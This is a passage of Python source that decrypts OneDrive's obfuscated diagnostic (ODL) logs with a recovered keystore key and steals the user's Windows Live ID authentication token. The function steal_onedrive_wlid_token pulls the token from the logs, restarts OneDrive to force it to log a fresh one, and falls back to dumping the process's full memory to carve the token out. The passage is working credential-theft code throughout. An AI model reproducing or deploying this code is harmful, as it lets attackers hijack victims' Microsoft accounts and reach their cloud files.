        cipher_text += "=" * (4 - remainder)
    try:
        # The tokens use URL-safe base64; map back to the standard alphabet.
        cipher_text = cipher_text.replace("_", "/").replace("-", "+")
        cipher_text = base64.b64decode(cipher_text)
    except Exception:
        # Fix: narrowed from a bare "except:" which would also swallow
        # KeyboardInterrupt/SystemExit.
        return ""

    if len(cipher_text) % 16 != 0:
        return ""  # AES-CBC ciphertext must be a multiple of the block size

    try:
        cipher = AES.new(key, AES.MODE_CBC, iv=b"\0" * 16)
        raw = cipher.decrypt(cipher_text)
    except ValueError as ex:
        print("Exception while decrypting data", str(ex))
        return ""
    try:
        plain_text = unpad(raw, 16)
    except ValueError:
        return ""  # bad PKCS#7 padding -> was not a real ciphertext
    try:
        plain_text = plain_text.decode(utf_type)
    except ValueError as ex:
        # NOTE: kept original behavior — on decode failure the raw unpadded
        # bytes are returned after logging.
        print(f"Error decoding {utf_type}", str(ex))
    return plain_text


def read_keystore(keystore_path):
    """Loads the unobfuscation key and utf type from the keystore file into
    the module-level `key`/`utf_type` globals."""
    global key
    global utf_type
    encoding = guess_encoding(keystore_path)
    with open(keystore_path, "r", encoding=encoding) as f:
        try:
            j = json.load(f)
            key = j[0]["Key"]
            version = j[0]["Version"]
            # Literal "\u0000\u0000" suffix in the stored key marks UTF-32 strings.
            utf_type = "utf32" if key.endswith("\\u0000\\u0000") else "utf16"
            print(f"Recovered Unobfuscation key {key}, version={version}, utf_type={utf_type}")
            key = base64.b64decode(key)
            if version != 1:
                print(f"WARNING: Key version {version} is unsupported. This may not work. Contact the author if you see this to add support for this version.")
        except ValueError as ex:
            print("JSON error " + str(ex))


def read_obfuscation_map(obfuscation_map_path, store_all_key_values):
    """Parses the tab-separated ObfuscationMap file into a dict.

    :param obfuscation_map_path: Path to the ObfuscationStringMap file
    :param store_all_key_values: When True, repeated keys accumulate all values
        ("old|new"); when False only the first (newest) value is kept.
    :return: dict mapping obfuscated tokens to plaintext values
    """
    map = {}
    repeated_items_found = False
    encoding = guess_encoding(obfuscation_map_path)
    with open(obfuscation_map_path, "r", encoding=encoding) as f:
        for line in f.readlines():
            line = line.rstrip("\n")
            terms = line.split("\t")
            if len(terms) == 2:
                if terms[0] in map:  # REPEATED item found!
                    repeated_items_found = True
                    if not store_all_key_values:
                        continue  # newer items are on top, skip older items found below.
                    old_val = map[terms[0]]
                    new_val = f"{old_val}|{terms[1]}"
                    map[terms[0]] = new_val
                    last_key = terms[0]
                    last_val = new_val
                else:
                    map[terms[0]] = terms[1]
                    last_key = terms[0]
                    last_val = terms[1]
            else:
                # Continuation of the previous entry's multi-line value.
                # NOTE(review): assumes a well-formed two-column first line,
                # otherwise last_key/last_val would be unbound — as before.
                if terms[0] in map:
                    if not store_all_key_values:
                        continue
                last_val += "\n" + line
                map[last_key] = last_val
    if repeated_items_found:
        print("WARNING: Multiple instances of some keys were found in the ObfuscationMap.")
    return map


def tokenized_replace(string, map):
    """Splits `string` on separator tokens, then deobfuscates each word via
    decrypt() (or the obfuscation `map` as a fallback), keeping tokens as-is.

    Parameter names shadow builtins but are kept for interface compatibility.
    """
    output = ""
    tokens = ":\\.@%#&*|{}!?<>;:~()//\"'"
    parts = []  # [ ("word", 1), (":", 0), ..] word=1, token=0
    last_word = ""
    last_token = ""
    for char in string:
        if char in tokens:
            # Flush any pending word, then extend the current token run.
            if last_word:
                parts.append((last_word, 1))
                last_word = ""
            last_token += char
        else:
            # Flush any pending token run, then extend the current word.
            if last_token:
                parts.append((last_token, 0))
                last_token = ""
            last_word += char
    if last_token:
        parts.append((last_token, 0))
    if last_word:
        parts.append((last_word, 1))

    # now join all parts replacing the words
    for part, is_word in parts:
        if not is_word:  # token
            output += part
        else:  # word
            decrypted_word = decrypt(part)
            if decrypted_word:
                output += decrypted_word
            elif part in map:
                output += map[part]
            else:
                output += part
    return output
def extract_windows_live_id_from_procdump(onedrive_pid=None):
    """Dumps OneDrive's memory to a temp file and carves a WLID token out of it.

    :param onedrive_pid: PID of the OneDrive process; resolved by process name
        for the current user when None.
    :return: The token string prefixed with WLID_TOKEN_PREFIX.
    """
    if onedrive_pid is None:
        current_user = win32api.GetUserNameEx(win32con.NameSamCompatible)
        onedrive_pid = get_process_pid_by_name(ONEDRIVE_PROCESS_NAME, username=current_user)

    tempfile_fd, tempfile_path = tempfile.mkstemp()
    os.close(tempfile_fd)
    try:
        create_dump(onedrive_pid, tempfile_path, MINIDUMP_TYPE_MiniDumpWithFullMemory)
        with open(tempfile_path, "rb") as f:
            token = extract_wlid_token_from_buffer(f.read())
    finally:
        # Fix: remove the (full-memory, potentially huge) dump file even when
        # dumping or token carving raises.
        os.remove(tempfile_path)

    return f"{WLID_TOKEN_PREFIX}{token}"


def extract_windows_live_id_from_odls():
    """Finds the most recent WLID ticket that OneDrive logged into its ODL logs.

    :return: The prefixed token string, or None when no suitable row/ticket exists.
    """
    odl_rows = get_odl_rows()
    latest_token_odl = None
    # Rows are chronological, so scan backwards for the latest connect event.
    for odl in odl_rows[::-1]:
        if odl["Function"] in ("NotificationServiceImpl::InternalConnect", "CWNPTransportImpl::Connect"):
            latest_token_odl = odl
            break

    if latest_token_odl is None:
        return None

    root_xml_element = ET.fromstring(latest_token_odl["Params_Decoded"][1])
    ticket_element = root_xml_element.find("ssl-compact-ticket")
    if ticket_element is None:
        # Fix: a row without the expected element no longer raises
        # AttributeError; None lets callers fall back to other methods.
        return None

    return f"{ODL_WLID_EXTRACTED_TOKEN_PREFIX}{ticket_element.text}"


def steal_onedrive_wlid_token():
    """Obtains a OneDrive WLID token, trying in order: the ODL logs, the ODL
    logs again after restarting OneDrive, and finally a process memory dump."""
    token = extract_windows_live_id_from_odls()
    if token is None:
        # Restart OneDrive so it re-authenticates and logs a fresh token.
        restart_onedrive(get_onedrive_info())
        time.sleep(WAIT_FOR_ONEDRIVE_TO_LOG_TOKEN_DELAY)
        token = extract_windows_live_id_from_odls()
        if token is None:
            token = extract_windows_live_id_from_procdump()
    return token